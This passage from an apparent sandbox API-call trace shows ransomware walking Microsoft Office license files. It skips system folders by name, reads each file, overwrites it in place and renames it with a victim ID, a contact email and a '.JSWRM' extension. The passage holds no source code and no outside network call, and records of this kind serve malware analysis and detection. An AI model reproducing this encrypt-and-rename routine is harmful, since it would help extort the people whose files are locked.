lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.727] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11633) returned 1 [0107.727] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.727] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.732] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.732] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.732] CloseHandle (hObject=0x45c) returned 1 [0107.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0107.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0107.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0107.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0107.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0107.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.733] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.734] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8eb0b81, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8eb0b81, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe90080b3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTrial-pl.xrm-ms", cAlternateFileName="PROJEC~4.XRM")) returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.734] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-pl.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0107.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.735] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11191) returned 1 [0107.735] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0107.735] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.767] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.768] CloseHandle (hObject=0x45c) returned 1 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0107.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0107.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0107.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.770] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe90080b3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe90080b3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe90c6c9f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="PR70C6~1.XRM")) returned 1 [0107.770] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.771] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.772] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20919) returned 1 [0107.772] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0107.772] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0107.775] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.775] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0107.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.775] CloseHandle (hObject=0x45c) returned 1 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0107.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0107.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0107.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0107.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.776] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0107.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.777] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8eb0b81, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8eb0b81, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8fe1eb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d76, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="PR0EA7~1.XRM")) returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.777] lstrcmpiW (lpString1="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 